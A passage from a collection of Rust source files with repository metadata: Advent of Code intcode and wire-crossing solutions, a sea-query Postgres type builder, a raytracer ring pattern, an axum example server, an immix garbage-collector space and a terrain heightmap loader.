cpu3.get_output_port(); let io4 = cpu4.get_output_port(); let mut output : BusReader<i32> = cpu4.get_output_port(); let amp0 = Amplifier::create(0, 0, cpu0, io4); let amp1 = Amplifier::create_no_value(1, cpu1, io0); let amp2 = Amplifier::create_no_value(2, cpu2, io1); let amp3 = Amplifier::create_no_value(3, cpu3, io2); let amp4 = Amplifier::create_no_value(4, cpu4, io3); amp0.run(); amp1.run(); amp2.run(); amp3.run(); amp4.run().join(); let mut max = 0; loop { match output.recv() { Ok(v) => max = v, Err(e) => break }; } assert_eq!(max, 54321); } #[test] fn given_input_part1_3() { let instructions = "3,31,3,32,1002,32,10,32,1001,31,-2,31,1007,31,0,33,1002,33,7,33,1,33,31,31,1,32,31,31,4,31,99,0,0,0"; let mut cpu0 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu1 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu2 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu3 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu4 = Intcode8086::initialize(parse_csv(instructions)); let io0 = cpu0.get_output_port(); let io1 = cpu1.get_output_port(); let io2 = cpu2.get_output_port(); let io3 = cpu3.get_output_port(); let io4 = cpu4.get_output_port(); let mut output : BusReader<i32> = cpu4.get_output_port(); let amp0 = Amplifier::create(1, 0, cpu0, io4); let amp1 = Amplifier::create_no_value(0, cpu1, io0); let amp2 = Amplifier::create_no_value(4, cpu2, io1); let amp3 = Amplifier::create_no_value(3, cpu3, io2); let amp4 = Amplifier::create_no_value(2, cpu4, io3); amp0.run(); amp1.run(); amp2.run(); amp3.run(); amp4.run().join(); let mut max = 0; loop { match output.recv() { Ok(v) => max = v, Err(e) => break }; } assert_eq!(max, 65210); } #[test] fn given_input_part2_1() { let instructions = "3,26,1001,26,-4,26,3,27,1002,27,2,27,1,27,26,27,4,27,1001,28,-1,28,1005,28,6,99,0,0,5"; let mut cpu0 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu1 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu2 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu3 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu4 = Intcode8086::initialize(parse_csv(instructions)); let io0 = cpu0.get_output_port(); let io1 = cpu1.get_output_port(); let io2 = cpu2.get_output_port(); let io3 = cpu3.get_output_port(); let io4 = cpu4.get_output_port(); let mut output : BusReader<i32> = cpu4.get_output_port(); let amp0 = Amplifier::create(9, 0, cpu0, io4); let amp1 = Amplifier::create_no_value(8, cpu1, io0); let amp2 = Amplifier::create_no_value(7, cpu2, io1); let amp3 = Amplifier::create_no_value(6, cpu3, io2); let amp4 = Amplifier::create_no_value(5, cpu4, io3); amp0.run(); amp1.run(); amp2.run(); amp3.run(); amp4.run().join(); let mut max = 0; loop { match output.recv() { Ok(v) => max = v, Err(e) => break }; } assert_eq!(max, 139629729); } #[test] fn given_input_part2_2() { let instructions = "3,52,1001,52,-5,52,3,53,1,52,56,54,1007,54,5,55,1005,55,26,1001,54,-5,54,1105,1,12,1,53,54,53,1008,54,0,55,1001,55,1,55,2,53,55,53,4,53,1001,56,-1,56,1005,56,6,99,0,0,0,0,10"; let mut cpu0 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu1 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu2 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu3 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu4 = Intcode8086::initialize(parse_csv(instructions)); let io0 = cpu0.get_output_port(); let io1 = cpu1.get_output_port(); let io2 = cpu2.get_output_port(); let io3 = cpu3.get_output_port(); let io4 = 
cpu4.get_output_port(); let mut output : BusReader<i32> = cpu4.get_output_port(); let amp0 = Amplifier::create(9, 0, cpu0, io4); let amp1 = Amplifier::create_no_value(7, cpu1, io0); let amp2 = Amplifier::create_no_value(8, cpu2, io1); let amp3 = Amplifier::create_no_value(5, cpu3, io2); let amp4 = Amplifier::create_no_value(6, cpu4, io3); amp0.run(); amp1.run(); amp2.run(); amp3.run(); amp4.run().join(); let mut max = 0; loop { match output.recv() { Ok(v) => max = v, Err(e) => break }; } assert_eq!(max, 18216); } }
true
ba0fed58c21409a8a0acb8a7117b811facb6a182
Rust
zeroDivisible/advent-of-code
/2019/day_02/src/main.rs
UTF-8
3,261
3.609375
4
[]
no_license
use std::{ fs::File, io::{prelude::*, BufReader}, path::Path, }; fn lines_from_file(filename: impl AsRef<Path>) -> Vec<String> { let file = File::open(filename).expect("no such file"); let buf = BufReader::new(file); buf.lines() .map(|l| l.expect("Could not parse line")) .collect() } fn execute_one(input: &mut Vec<i32>, register: usize) -> bool { let opcode = input[register]; if opcode == 99 { return false } let arg1 = input[input[register + 1] as usize]; let arg2 = input[input[register + 2] as usize]; let outindex = input[register + 3] as usize; match opcode { 1 => { input[outindex] = arg1 + arg2; return true } 2 => { input[outindex] = arg1 * arg2; return true } _ => { panic!("invalid opcode") } } } fn execute_all(input: &mut Vec<i32>, register: usize) -> () { let mut index = register; let done = false; while !done { let finished = execute_one(input, index); if !finished { break } index += 4 } } fn prepare_input(input: &Vec<String>) -> Vec<i32> { let line = input.first().unwrap(); line .split(",") .map(|s| s.to_string().parse::<i32>().unwrap()) .collect() } fn part_01(input: &Vec<String>) -> () { let mut parsed = prepare_input(input); parsed[1] = 12; parsed[2] = 2; execute_all(&mut parsed, 0); dbg!(parsed[0]); } fn part_02(input: &Vec<String>) -> () { let parsed = prepare_input(input); for noun in 0..99 { for verb in 0..99 { let mut program = parsed.clone(); program[1] = noun; program[2] = verb; execute_all(&mut program, 0); if program[0] == 19690720 { println!("noun = {}, verb = {}", noun, verb); println!("result = {}", 100 * noun + verb); break; } } } } fn main() { let input = lines_from_file("input/input.txt"); part_01(&input); part_02(&input); } #[cfg(test)] mod tests { use super::*; #[test] fn it_prepares_input() { let input = vec!["1,2,3,4,5".to_string()]; assert_eq!(prepare_input(&input), vec![1,2,3,4,5]); } #[test] fn it_executes_one_iteration() { let mut input = vec![1,0,0,0,99]; execute_one(&mut input, 0); assert_eq!(input, vec![2,0,0,0,99]); let mut input = vec![2,3,0,3,99]; execute_one(&mut input, 0); assert_eq!(input, vec![2,3,0,6,99]); let mut input = vec![2,4,4,5,99,0]; execute_one(&mut input, 0); assert_eq!(input, vec![2,4,4,5,99,9801]); let mut input = vec![1,1,1,4,99,5,6,0,99]; execute_one(&mut input, 0); execute_one(&mut input, 4); let return_value = execute_one(&mut input, 8); assert_eq!(input, vec![30,1,1,4,2,5,6,0,99]); assert_eq!(return_value, false); } #[test] fn it_executes_all() { let mut input = vec![1,1,1,4,99,5,6,0,99]; execute_all(&mut input, 0); assert_eq!(input, vec![30,1,1,4,2,5,6,0,99]); } }
true
0e03be4fc969966944526400efc9ef1f06ccd276
Rust
duchainer/sea-query
/src/backend/postgres/types.rs
UTF-8
1,879
2.890625
3
[ "Apache-2.0", "MIT" ]
permissive
use super::*; use crate::extension::postgres::types::*; impl TypeBuilder for PostgresQueryBuilder { fn prepare_type_create_statement(&self, create: &TypeCreateStatement, sql: &mut SqlWriter, collector: &mut dyn FnMut(Value)) { write!(sql, "CREATE TYPE ").unwrap(); if let Some(name) = &create.name { name.prepare(sql, '"'); } if let Some(as_type) = &create.as_type { write!(sql, " AS ").unwrap(); self.prepare_create_as_type(&as_type, sql); } if !create.values.is_empty() { write!(sql, " (").unwrap(); for (count, val) in create.values.iter().enumerate() { if count > 0 { write!(sql, ", ").unwrap(); } self.prepare_value(&val.to_string().into(), sql, collector); } write!(sql, ")").unwrap(); } } fn prepare_type_drop_statement(&self, drop: &TypeDropStatement, sql: &mut SqlWriter, _collector: &mut dyn FnMut(Value)) { write!(sql, "DROP TYPE ").unwrap(); if drop.if_exists { write!(sql, "IF EXISTS ").unwrap(); } for name in drop.names.iter() { name.prepare(sql, '"'); } if let Some(option) = &drop.option { write!(sql, " ").unwrap(); self.prepare_drop_type_opt(&option, sql); } } } impl PostgresQueryBuilder { fn prepare_create_as_type(&self, as_type: &TypeAs, sql: &mut SqlWriter) { write!(sql, "{}", match as_type { TypeAs::Enum => "ENUM", }).unwrap() } fn prepare_drop_type_opt(&self, opt: &TypeDropOpt, sql: &mut SqlWriter) { write!(sql, "{}", match opt { TypeDropOpt::Cascade => "CASCADE", TypeDropOpt::Restrict => "RESTRICT", }).unwrap() } }
true
00de287bd08343e89a8c9c4e068f7474b0e998db
Rust
po-gl/Raytracer
/src/pattern/ring_pattern.rs
UTF-8
2,067
3.71875
4
[ "MIT" ]
permissive
/// # Ring Patterns /// `ring_pattern` is a module to represent ring patterns (bull's eye) use crate::color::Color; use crate::tuple::Tuple; use crate::matrix::Matrix4; use crate::pattern::Pattern; use std::fmt::{Formatter, Error}; use std::any::Any; use crate::float::Float; #[derive(Debug, PartialEq, Copy, Clone)] pub struct RingPattern { pub a: Color, // First color used in the pattern pub b: Color, // Second color used in the pattern pub transform: Matrix4, } impl RingPattern { pub fn new(color_a: Color, color_b: Color) -> RingPattern { RingPattern { a: color_a, b: color_b, transform: Matrix4::identity() } } } impl Pattern for RingPattern { fn as_any(&self) -> &dyn Any { self } fn box_eq(&self, other: &dyn Any) -> bool { other.downcast_ref::<Self>().map_or(false, |a| self == a) } fn debug_fmt(&self, f: &mut Formatter<'_>) -> Result<(), Error> { write!(f, "Box {:?}", self) } fn pattern_clone(&self) -> Box<dyn Pattern + Send> { Box::new(*self) } fn transform(&self) -> Matrix4 { self.transform } fn set_transform(&mut self, transform: Matrix4) { self.transform = transform; } fn pattern_at(&self, point: &Tuple) -> Color { // floor of the magnitude (x, z) mod 2 == 0 if Float((point.x * point.x + point.z * point.z).value().sqrt().floor() % 2.0) == Float(0.0) { self.a } else { self.b } } } #[cfg(test)] mod tests { use super::*; use crate::tuple::point; #[test] fn ring_pattern() { let pattern = RingPattern::new(Color::white(), Color::black()); assert_eq!(pattern.pattern_at(&point(0.0, 0.0, 0.0)), Color::white()); assert_eq!(pattern.pattern_at(&point(1.0, 0.0, 0.0)), Color::black()); assert_eq!(pattern.pattern_at(&point(0.0, 0.0, 1.0)), Color::black()); // 0.708 is slightly more than 2.0.sqrt()/2 assert_eq!(pattern.pattern_at(&point(0.708, 0.0, 0.708)), Color::black()); } }
true
e689ae3e6bd1514cbe7a350f6ead3e52f05c2e40
Rust
JohnTitor/crates.io
/conduit-axum/examples/server.rs
UTF-8
1,111
2.515625
3
[ "MIT", "Apache-2.0" ]
permissive
#![deny(clippy::all)]

use axum::routing::get;
use conduit_axum::{
    server_error_response, spawn_blocking, ConduitRequest, HandlerResult, ServiceError,
};

use axum::response::IntoResponse;
use std::io;
use std::thread::sleep;

#[tokio::main]
async fn main() {
    tracing_subscriber::fmt::init();

    let router = axum::Router::new()
        .route("/", get(endpoint))
        .route("/panic", get(panic))
        .route("/error", get(error));

    let addr = ([127, 0, 0, 1], 12345).into();
    axum::Server::bind(&addr)
        .serve(router.into_make_service())
        .await
        .unwrap()
}

async fn endpoint(_: ConduitRequest) -> HandlerResult {
    spawn_blocking(move || sleep(std::time::Duration::from_secs(2)))
        .await
        .map_err(ServiceError::from)
        .map(|_| "Hello world!")
        .into_response()
}

async fn panic(_: ConduitRequest) -> HandlerResult {
    // For now, connection is immediately closed
    panic!("message");
}

async fn error(_: ConduitRequest) -> HandlerResult {
    server_error_response(&io::Error::new(io::ErrorKind::Other, "io error, oops"))
}
true
7cb53a3fba9bccf0b1872161bf7c261e1d587db9
Rust
microvm/immix-rust
/src/heap/immix/immix_space.rs
UTF-8
12,853
2.671875
3
[]
no_license
use heap::immix; use heap::gc; use common::Address; use common::AddressMap; extern crate std; extern crate memmap; extern crate libc; use std::*; use std::collections::LinkedList; use std::sync::Mutex; use std::sync::Arc; // this table will be accessed through unsafe raw pointers. since Rust doesn't provide a data structure for such guarantees: // 1. Non-overlapping segments of this table may be accessed parallelly from different mutator threads // 2. One element may be written into at the same time by different gc threads during tracing #[derive(Clone)] pub struct LineMarkTable { space_start : Address, ptr : *mut immix::LineMark, len : usize, } #[derive(Clone)] pub struct LineMarkTableSlice { ptr : *mut immix::LineMark, len : usize } impl LineMarkTable { pub fn new(space_start: Address, space_end: Address) -> LineMarkTable { let line_mark_table_len = space_end.diff(space_start) / immix::BYTES_IN_LINE; let line_mark_table = { let ret = unsafe {libc::malloc((mem::size_of::<immix::LineMark>() * line_mark_table_len) as libc::size_t)} as *mut immix::LineMark; let mut cursor = ret; for _ in 0..line_mark_table_len { unsafe {*cursor = immix::LineMark::Free;} cursor = unsafe {cursor.offset(1)}; } ret }; LineMarkTable{space_start: space_start, ptr: line_mark_table, len: line_mark_table_len} } pub fn take_slice(&mut self, start: usize, len: usize) -> LineMarkTableSlice { LineMarkTableSlice{ptr: unsafe {self.ptr.offset(start as isize)}, len: len} } #[inline(always)] fn get(&self, index: usize) -> immix::LineMark { debug_assert!(index <= self.len); unsafe {*self.ptr.offset(index as isize)} } #[inline(always)] fn set(&self, index: usize, value: immix::LineMark) { debug_assert!(index <= self.len); unsafe {*self.ptr.offset(index as isize) = value}; } #[inline(always)] pub fn mark_line_live(&self, addr: Address) { let line_table_index = addr.diff(self.space_start) >> immix::LOG_BYTES_IN_LINE; self.set(line_table_index, immix::LineMark::Live); if line_table_index < self.len - 1 { self.set(line_table_index + 1, immix::LineMark::ConservLive); } } #[inline(always)] pub fn mark_line_live2(&self, space_start: Address, addr: Address) { let line_table_index = addr.diff(space_start) >> immix::LOG_BYTES_IN_LINE; self.set(line_table_index, immix::LineMark::Live); if line_table_index < self.len - 1 { self.set(line_table_index + 1, immix::LineMark::ConservLive); } } } impl LineMarkTableSlice { #[inline(always)] pub fn get(&self, index: usize) -> immix::LineMark { debug_assert!(index <= self.len); unsafe {*self.ptr.offset(index as isize)} } #[inline(always)] pub fn set(&mut self, index: usize, value: immix::LineMark) { debug_assert!(index <= self.len); unsafe {*self.ptr.offset(index as isize) = value}; } #[inline(always)] pub fn len(&self) -> usize { self.len } } #[repr(C)] pub struct ImmixSpace { start : Address, end : Address, // these maps are writable at allocation, read-only at collection pub alloc_map : Arc<AddressMap<u8>>, // these maps are only for collection pub trace_map : Arc<AddressMap<u8>>, // this table will be accessed through unsafe raw pointers. since Rust doesn't provide a data structure for such guarantees: // 1. Non-overlapping segments of this table may be accessed parallelly from different mutator threads // 2. 
One element may be written into at the same time by different gc threads during tracing pub line_mark_table : LineMarkTable, total_blocks : usize, // for debug use #[allow(dead_code)] mmap : memmap::Mmap, usable_blocks : Mutex<LinkedList<Box<ImmixBlock>>>, used_blocks : Mutex<LinkedList<Box<ImmixBlock>>>, } pub struct ImmixBlock { id : usize, state : immix::BlockMark, start : Address, // a segment of the big line mark table in ImmixSpace line_mark_table : LineMarkTableSlice } const SPACE_ALIGN : usize = 1 << 19; impl ImmixSpace { pub fn new(space_size : usize) -> ImmixSpace { // acquire memory through mmap let anon_mmap : memmap::Mmap = match memmap::Mmap::anonymous(space_size + SPACE_ALIGN, memmap::Protection::ReadWrite) { Ok(m) => m, Err(_) => panic!("failed to call mmap"), }; let start : Address = Address::from_ptr::<u8>(anon_mmap.ptr()).align_up(SPACE_ALIGN); let end : Address = start.plus(space_size); let line_mark_table = LineMarkTable::new(start, end); let mut ret = ImmixSpace { start: start, end: end, mmap: anon_mmap, line_mark_table: line_mark_table, trace_map: Arc::new(AddressMap::new(start, end)), alloc_map: Arc::new(AddressMap::new(start, end)), usable_blocks: Mutex::new(LinkedList::new()), used_blocks: Mutex::new(LinkedList::new()), total_blocks: 0 }; ret.init_blocks(); ret } fn init_blocks(&mut self) -> () { let mut id = 0; let mut block_start = self.start; let mut line = 0; let mut usable_blocks_lock = self.usable_blocks.lock().unwrap(); while block_start.plus(immix::BYTES_IN_BLOCK) <= self.end { usable_blocks_lock.push_back(Box::new(ImmixBlock { id : id, state: immix::BlockMark::Usable, start: block_start, line_mark_table: self.line_mark_table.take_slice(line, immix::LINES_IN_BLOCK) })); id += 1; block_start = block_start.plus(immix::BYTES_IN_BLOCK); line += immix::LINES_IN_BLOCK; } self.total_blocks = id; } pub fn return_used_block(&self, old : Box<ImmixBlock>) { // Unsafe and raw pointers are used to transfer ImmixBlock to/from each Mutator. 
// This avoids explicit ownership transferring // If we explicitly transfer ownership, the function needs to own the Mutator in order to move the ImmixBlock out of it (see ImmixMutatorLocal.alloc_from_global()), // and this will result in passing the Mutator object as value (instead of a borrowed reference) all the way in the allocation self.used_blocks.lock().unwrap().push_front(old); } #[allow(unreachable_code)] pub fn get_next_usable_block(&self) -> Option<Box<ImmixBlock>> { let res_new_block : Option<Box<ImmixBlock>> = { self.usable_blocks.lock().unwrap().pop_front() }; if res_new_block.is_none() { // should unlock, and call GC here gc::trigger_gc(); None } else { res_new_block } } #[allow(unused_variables)] pub fn sweep(&self) { let mut free_lines = 0; let mut usable_blocks = 0; let mut full_blocks = 0; let mut used_blocks_lock = self.used_blocks.lock().unwrap(); let mut usable_blocks_lock = self.usable_blocks.lock().unwrap(); let mut live_blocks : LinkedList<Box<ImmixBlock>> = LinkedList::new(); while !used_blocks_lock.is_empty() { let mut block = used_blocks_lock.pop_front().unwrap(); let mut has_free_lines = false; { let mut cur_line_mark_table = block.line_mark_table_mut(); for i in 0..cur_line_mark_table.len() { if cur_line_mark_table.get(i) != immix::LineMark::Live && cur_line_mark_table.get(i) != immix::LineMark::ConservLive { has_free_lines = true; cur_line_mark_table.set(i, immix::LineMark::Free); free_lines += 1; } } // release the mutable borrow of 'block' } if has_free_lines { block.set_state(immix::BlockMark::Usable); usable_blocks += 1; usable_blocks_lock.push_front(block); } else { block.set_state(immix::BlockMark::Full); full_blocks += 1; live_blocks.push_front(block); } } used_blocks_lock.append(&mut live_blocks); if cfg!(debug_assertions) { println!("free lines = {} of {} total", free_lines, self.total_blocks * immix::LINES_IN_BLOCK); println!("usable blocks = {}", usable_blocks); println!("full blocks = {}", full_blocks); } if full_blocks == self.total_blocks { println!("Out of memory in Immix Space"); std::process::exit(1); } debug_assert!(full_blocks + usable_blocks == self.total_blocks); } pub fn start(&self) -> Address { self.start } pub fn end(&self) -> Address { self.end } pub fn line_mark_table(&self) -> &LineMarkTable { &self.line_mark_table } #[inline(always)] pub fn addr_in_space(&self, addr: Address) -> bool { addr >= self.start && addr < self.end } } impl ImmixBlock { pub fn get_next_available_line(&self, cur_line : usize) -> Option<usize> { let mut i = cur_line; while i < self.line_mark_table.len { match self.line_mark_table.get(i) { immix::LineMark::Free => {return Some(i);}, _ => {i += 1;}, } } None } pub fn get_next_unavailable_line(&self, cur_line : usize) -> usize { let mut i = cur_line; while i < self.line_mark_table.len { match self.line_mark_table.get(i) { immix::LineMark::Free => {i += 1;} _ => {return i; }, } } i } pub fn id(&self) -> usize { self.id } pub fn start(&self) -> Address { self.start } pub fn set_state(&mut self, mark: immix::BlockMark) { self.state = mark; } #[inline(always)] pub fn line_mark_table(&self) -> &LineMarkTableSlice { &self.line_mark_table } #[inline(always)] pub fn line_mark_table_mut(&mut self) -> &mut LineMarkTableSlice { &mut self.line_mark_table } } /// Using raw pointers forbid the struct being shared between threads /// we ensure the raw pointers won't be an issue, so we allow Sync/Send on ImmixBlock unsafe impl Sync for ImmixBlock {} unsafe impl Send for ImmixBlock {} unsafe impl Sync for ImmixSpace {} unsafe 
impl Send for ImmixSpace {} impl fmt::Display for ImmixSpace { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "ImmixSpace\n").unwrap(); write!(f, "range={:#X} ~ {:#X}\n", self.start, self.end).unwrap(); // print table by vec // write!(f, "table={{\n").unwrap(); // for i in 0..self.line_mark_table_len { // write!(f, "({})", i).unwrap(); // write!(f, "{:?},", unsafe{*self.line_mark_table.offset(i as isize)}).unwrap(); // if i % immix::BYTES_IN_LINE == immix::BYTES_IN_LINE - 1 { // write!(f, "\n").unwrap(); // } // } // write!(f, "\n}}\n").unwrap(); write!(f, "t_ptr={:?}\n", self.line_mark_table.ptr).unwrap(); // write!(f, "usable blocks:\n").unwrap(); // for b in self.usable_blocks.iter() { // write!(f, " {}\n", b).unwrap(); // } // write!(f, "used blocks:\n").unwrap(); // for b in self.used_blocks.iter() { // write!(f, " {}\n", b).unwrap(); // } write!(f, "done\n") } } impl fmt::Display for ImmixBlock { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "ImmixBlock#{}(state={:?}, address={:#X}, line_table={:?}", self.id, self.state, self.start, self.line_mark_table.ptr).unwrap(); write!(f, "[").unwrap(); for i in 0..immix::LINES_IN_BLOCK { write!(f, "{:?},", self.line_mark_table.get(i)).unwrap(); } write!(f, "]") } }
true
82e1bcd0988973908b9a4832290b59f0d72f4e90
Rust
Syphonx/aoc-2019
/src/day3.rs
UTF-8
6,554
3.234375
3
[]
no_license
/* --- Day 3: Crossed Wires --- */ use failure::Error; #[derive(Debug, PartialEq, Copy, Clone)] pub enum WireDirection { Invalid, Up, Right, Down, Left, } #[derive(Debug, PartialEq, Copy, Clone)] pub struct Point { x: i32, y: i32, } impl Point { const INVALID_POINT: Point = Point { x: 0, y: 0 }; pub fn new(x: i32, y: i32) -> Self { Point { x, y } } fn manhattan_distance(&self, other: &Point) -> usize { ((self.x - other.x).abs() + (self.y - other.y).abs()) as usize } } #[derive(Debug, PartialEq, Copy, Clone)] pub struct Line { from: Point, to: Point, } impl Line { fn length(&self) -> usize { self.from.manhattan_distance(&self.to) } fn length_to_point(&self, point: &Point) -> usize { self.from.manhattan_distance(point) } fn x_min(&self) -> i32 { std::cmp::min(self.from.x, self.to.x) } fn x_max(&self) -> i32 { std::cmp::max(self.from.x, self.to.x) } fn y_min(&self) -> i32 { std::cmp::min(self.from.y, self.to.y) } fn y_max(&self) -> i32 { std::cmp::max(self.from.y, self.to.y) } fn intersection(&self, other: &Line) -> Option<Point> { let f = |l1: &Line, l2: &Line| { if (l1.x_min() >= l2.x_min() && l1.x_min() <= l2.x_max()) && (l2.y_min() >= l1.y_min() && l2.y_min() <= l1.y_max()) { return Some(Point::new(l1.x_min(), l2.y_min())); } else { return None; } }; let (f1, f2) = (f(self, other), f(other, self)); let res = f1.or(f2); if let Some(p) = res { if p != Point::new(0, 0) { return res; } else { return None; } } else { return res; } } } #[derive(Debug, Copy, Clone, PartialEq)] pub struct CrossingPoint { point: Point, steps: usize, } impl CrossingPoint { fn new(point: &Point, steps: usize) -> Self { CrossingPoint { point: *point, steps, } } } pub struct Wire { direction: WireDirection, length: i32, index: i32, line: Line, } pub fn char_to_direction(input: &char) -> WireDirection { match input { 'U' => WireDirection::Up, 'D' => WireDirection::Down, 'L' => WireDirection::Left, 'R' => WireDirection::Right, _ => WireDirection::Invalid, } } pub fn enum_to_str(input: &WireDirection) -> &'static str { match input { WireDirection::Up => "Up", WireDirection::Down => "Down", WireDirection::Left => "Left", WireDirection::Right => "Right", WireDirection::Invalid => "Invalid", } } pub fn direction_to_move(direction: &WireDirection, length: i32) -> (i32, i32) { match direction { WireDirection::Up => (0, length), WireDirection::Down => (0, -length), WireDirection::Left => (-length, 0), WireDirection::Right => (length, 0), WireDirection::Invalid => (0, 0), } } #[aoc_generator(day3)] pub fn input_generator(input: &str) -> Vec<Wire> { let mut wires: Vec<Wire> = Vec::new(); let mut marker: (i32, i32) = (0, 0); for (index, line) in input.lines().enumerate() { for wire in line.trim().split(',') { let (dir, len) = wire.trim().split_at(1); let direction: WireDirection = char_to_direction(&dir.chars().next().unwrap()); let length: i32 = len.parse::<i32>().expect("Expected integer"); let new_wire = Wire { direction, length, index: index as i32, line: Line { from: Point::new(marker.0, marker.1), to: Point::new( marker.0 + direction_to_move(&direction, length).0, marker.1 + direction_to_move(&direction, length).1, ), }, }; marker.0 = new_wire.line.to.x; marker.1 = new_wire.line.to.y; wires.push(new_wire); } marker = (0, 0); } return wires; } pub fn print_path(path: &Wire) { println!( "Wire: {} - ({}, {}) -> ({}, {}) = {} - [{}]", enum_to_str(&path.direction), path.line.from.x, path.line.from.y, path.line.to.x, path.line.to.y, path.length, path.index ); } pub fn print_intersection(intersection: &Point, path: &Line, other: 
&Line) { println!( "Intersection {:?} between {:?} and {:?}", intersection, path, other ); } pub fn collect_intersections<'a, 'b>( wire_0: &'a Vec<&Wire>, wire_1: &'b Vec<&Wire>, ) -> Result<Vec<CrossingPoint>, Error> { // Keep track of the intersections let intersections = wire_0 .iter() .enumerate() .flat_map(|(i, wire)| { wire_1 .iter() .enumerate() .filter_map(move |(j, other_wire)| { let intersection = wire.line.intersection(&other_wire.line); match intersection { Some(x) => { // Don't match intersections at (0, 0) if x != Point::INVALID_POINT { wire.line.intersection(&other_wire.line).map(|a| { CrossingPoint::new( &a, wire_0 .iter() .take(i) .map(|a| a.line.length()) .sum::<usize>() + wire.line.length_to_point(&a) + wire_1 .iter() .take(j) .map(|a| a.line.length()) .sum::<usize>() + other_wire.line.length_to_point(&a), ) }) } else { None } } None => None, } }) }) .collect::<Vec<CrossingPoint>>(); if intersections.is_empty() { return Err(failure::format_err!("No crossed wires found.")); } else { return Ok(intersections); } } #[aoc(day3, part1)] pub fn solve_part1(input: &[Wire]) -> i32 { // Define our origin point let origin = Point::new(0, 0); // Split the input into wire 1 and wire 2 let wire_1: Vec<&Wire> = input.into_iter().filter(|x| x.index == 0).collect(); let wire_2: Vec<&Wire> = input.into_iter().filter(|x| x.index == 1).collect(); // Collect intersections let intersections: Vec<CrossingPoint> = collect_intersections(&wire_1, &wire_2).unwrap(); // Parse the intersections and find the closest let min_distance = intersections .iter() .map(|i| (origin.manhattan_distance(&i.point), i)) .min_by_key(|t| t.0) .expect("Could not find a minimum manhattan distance."); // Finally, return our value return min_distance.0 as i32; } #[aoc(day3, part2)] pub fn solve_part2(input: &[Wire]) -> i32 { // Split the input into wire 1 and wire 2 let wire_1: Vec<&Wire> = input.into_iter().filter(|x| x.index == 0).collect(); let wire_2: Vec<&Wire> = input.into_iter().filter(|x| x.index == 1).collect(); // Collect intersections let intersections: Vec<CrossingPoint> = collect_intersections(&wire_1, &wire_2).unwrap(); // Parse the intersections and find the closest let min_distance = intersections .iter() .map(|i| (i.steps, i.point)) .min_by_key(|t| t.0) .expect("Could not find a minimum number of steps."); // Finally, return our value return min_distance.0 as i32; }
true
42633cc44a662285ee4a36a50b43686629df1052
Rust
guilhemSmith/mod1
/src/algo/heightmap.rs
UTF-8
4,244
2.84375
3
[]
no_license
use super::{Map, DIM}; use crate::engine::{Entity, EntityStore, Mesh}; use glam::{Vec2, Vec3}; use std::any::Any; use std::fs::File; use std::io::{BufRead, BufReader}; const WEIGHT_DIST: f32 = 5.0; const MAP_SIZE: usize = DIM * DIM; const MAP_SCALE: f32 = 1.0; #[derive(Debug)] pub struct HeightMap { points: Map<MAP_SIZE>, } impl HeightMap { pub fn new(filename: &str) -> Result<Self, String> { let mut poi: Vec<Vec3> = Vec::new(); let file = File::open(filename).map_err(|err| format!("Failed to read file: {}", err))?; let reader = BufReader::new(file); for (index_l, line) in reader.lines().enumerate() { let line = line.map_err(|err| format!("Failed to read file: {}", err))?; let mut point: [f32; 3] = [0.0; 3]; let mut count = 0; for (index_v, value) in line.split_ascii_whitespace().enumerate() { count += 1; if count > 3 { return Err(format!("[line: {}] Too many values", index_l + 1)); } point[index_v] = value .parse() .map_err(|err| { format!( "[line: {}, pos: {}] Invalid value '{}' ({})", index_l + 1, index_v + 1, value, err ) }) .and_then(|number| { if index_v < 2 { match number { n if n < 100.0 && n > 0.0 => Ok(n), n => Err(format!( "[line: {}, pos: {}] Invalid coordinate number '{}' (not between 0 and 99)", index_l + 1, index_v + 1, n )), } } else { match number { n if n < 50.0 && n > -50.0 => Ok(n), n => Err(format!( "[line: {}, pos: {}] Invalid height number '{}' (not between -50 and 50)", index_l + 1, index_v + 1, n )), } } })?; } if count < 3 { return Err(format!("[line: {}] Not enough values", index_l + 1)); } poi.push(Vec3::from(point)); } let scaled = poi.into_iter().map(|pt| pt * MAP_SCALE).collect(); let map = HeightMap::poi_to_map(scaled); Ok(HeightMap { points: map }) } pub fn height_points(&self) -> &Map<MAP_SIZE> { &self.points } pub fn border_wall(&self) -> Vec<Vec3> { let dim = (DIM - 1) as f32; vec![ Vec3::new(0.0, 0.0, -50.0), Vec3::new(0.0, 0.0, 0.0), Vec3::new(dim, 0.0, -50.0), Vec3::new(dim, 0.0, 0.0), Vec3::new(dim, dim, -50.0), Vec3::new(dim, dim, 0.0), Vec3::new(0.0, dim, -50.0), Vec3::new(0.0, dim, 0.0), Vec3::new(0.0, 0.0, -50.0), Vec3::new(0.0, 0.0, 0.0), ] } fn add_border_zero(poi: &mut Vec<Vec3>) { let max_val = (DIM - 1) as f32; poi.push(Vec3::new(0.0, 0.0, 0.0)); poi.push(Vec3::new(0.0, max_val, 0.0)); poi.push(Vec3::new(max_val, 0.0, 0.0)); poi.push(Vec3::new(max_val, max_val, 0.0)); for i in 1..(DIM - 1) { let variant = i as f32; poi.push(Vec3::new(variant, 0.0, 0.0)); poi.push(Vec3::new(0.0, variant, 0.0)); poi.push(Vec3::new(variant, max_val, 0.0)); poi.push(Vec3::new(max_val, variant, 0.0)); } } fn idw(coord: Vec2, poi: &Vec<Vec3>) -> f32 { let mut top = 0.0; let mut bot = 0.0; for i in poi.iter() { let k_coord = Vec2::new(i.x, i.y); let k_value = i.z; let inv_dist = (1.0 / (coord - k_coord).length()).powf(WEIGHT_DIST); top += inv_dist * k_value; bot += inv_dist; } return top / bot; } fn poi_to_map(mut poi: Vec<Vec3>) -> [f32; MAP_SIZE] { HeightMap::add_border_zero(&mut poi); let mut map = [0.0; MAP_SIZE]; for i in 0..DIM { let x = i as f32; for j in 0..DIM { let y = j as f32; if let Some(point) = poi.iter().find(|pt| pt.x == x && pt.y == y) { map[i + j * DIM] = point.z } 